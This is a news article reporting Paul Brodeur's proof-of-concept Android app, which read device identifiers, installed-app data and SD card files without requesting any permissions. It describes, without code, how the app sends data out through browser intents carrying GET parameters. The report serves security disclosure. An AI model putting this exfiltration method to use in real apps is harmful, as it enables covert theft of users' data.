When installing new apps on an Android device, users are asked to give their permission for specific actions that an app must be able to perform in order to function properly.
As we already know, the “permission” security model mostly fails to protect users because many of them aren’t prepared to give up on installing a particular app even though the permission it asks could be exploited for data exfiltration and other even more malicious goals.
But what about apps that don’t ask for any permission? What (if anything) are they able to access and exfiltrate?
The question was answered by Leviathan Security researcher Paul Brodeur, who developed a proof-of-concept app he dubbed ”No Permissions”.
By testing it on a number of devices and an Android emulator, he discovered that the app could access and grab identifiable information (GSM & SIM vendor IDs, kernel version and name of custom ROM installed, Android ID), access a list of apps installed on the device, as well as readable files belonging to them, and access the device’s SD card and fetch all non-hidden files on it.
“It’s worth noting that even though the Android developer docs state that there’s no security enforced upon files stored on external storage, many things are stored on the SD Card, including photos, backups, and any external configuration files — on my own device, I found that OpenVPN certificates were stored on the SD card (which I promptly corrected!)” he pointed out.
So, all this data can be accessed and grabbed by the app, but can it be transmitted to a remote location? Brodeur says yes.
By using the URI ACTION-VIEW Intent network access call – which can be made without permissions – the app can open a browser and pass the data to it via GET parameters in a URI, and transmit large amounts of data by creating additional browser calls.
Brodeur is not the first to prove and point out that the Android permission model has inherent flaws, and is, unfortunately, likely not to be the last, but hopefully it will take us a step closer to the moment when things will have to be changed.
For an interesting peek into Android security from the ground up and details about the flaws in its security model I recommend reading this interview with Georgia Weidman, a penetration tester, security researcher, trainer and speaker at the upcoming HITBSecConf 2012 Amsterdam conference.